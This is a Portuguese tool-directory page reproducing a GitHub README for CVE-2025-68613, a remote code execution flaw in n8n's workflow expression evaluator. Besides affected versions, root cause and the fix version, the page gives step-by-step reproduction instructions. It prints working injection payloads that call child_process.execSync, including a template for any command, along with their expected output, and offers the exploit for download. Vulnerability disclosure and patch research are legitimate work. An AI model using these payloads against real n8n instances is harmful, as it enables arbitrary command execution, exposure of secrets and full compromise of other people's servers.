Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
n8n-CVE-2025-68613-exploit — CVE-2025-68613: exploit e documentação da vulnerabilidade RCE n8n | Kitploit
Ferramentas/GitHubGitHub/wioui/n8n-cve-2025-68613-exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubwioui/n8n-cve-2025-68613-exploit

n8n-CVE-2025-68613-exploit

CVE-2025-68613: exploit e documentação da vulnerabilidade RCE n8n

Ver Repositório
106222há 8 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

n8n - CVE-2025-68613: Controle Impróprio de Recursos de Código Gerenciados Dinamicamente

Vulnerabilidade

n8n contém uma vulnerabilidade crítica de Execução Arbitrária de Código em seu sistema de avaliação de expressões de workflow. Sob certas condições, expressões fornecidas por usuários autenticados durante a configuração do workflow podem ser avaliadas em um contexto de execução que não está suficientemente isolado do runtime subjacente.

Versões Afetadas

  • Vulnerável: n8n < v1.122.0
  • Corrigido: n8n >= v1.122.0

Requisitos

  • Acesso autenticado à instância do n8n
  • Capacidade de criar/editar workflows

Passos para Reproduzir

1. Criar Novo Workflow

  • Clique em "Add workflow"

2. Adicionar Nós

  • Adicione o nó "Manual Trigger"
  • Adicione o nó "Set" (conectado ao trigger)

3. Configurar Payload

  • Clique no nó Set
  • Clique em "Add Value" → Selecione "String"
  • Nomeie o campo como "result"
  • Clique no ícone "=" para ativar o modo de expressão

4. Injetar Payload

Cole este payload no campo de expressão:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

5. Executar

  • Clique em "Execute step"
  • Verifique a saída do nó Set para o resultado do comando

Demonstração de Exploit CVE-2025-68613

Exemplos de Payload

Comando ID:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

Comando PWD:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}

Modelo de Comando Personalizado:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}

Saída Esperada

Para o comando id:

root@kitploit:~
uid=1000(node) gid=1000(node) groups=1000(node)

Para o comando pwd:

root@kitploit:~
/app

Causa Raiz

O avaliador de expressões carece de um sanitizador para impedir que expressões de função acessem this.process (objeto de processo do Node.js), permitindo acesso a módulos do sistema.

Impacto

  • Execução arbitrária de comandos
  • Acesso ao sistema de arquivos
  • Exposição de variáveis de ambiente
  • Comprometimento total do sistema

Mitigação

Atualize para n8n v1.122.0 ou superior.

Referências

  • Correção: https://github.com/n8n-io/n8n/commit/08f332015153decdda3c37ad4fcb9f7ba13a7c79
  • Repositório: https://github.com/n8n-io/n8n
  • Postagem do blog: https://blog.ogwilliam.com/post/n8n-rce-vulnerability-cve-2025-68613

Aviso: Esta informação é fornecida apenas para fins de sandbox e educação. O uso não autorizado desta informação para explorar sistemas é ilegal e antiético. Sempre obtenha a devida autorização antes de testar ou explorar vulnerabilidades.

Baixar ferramenta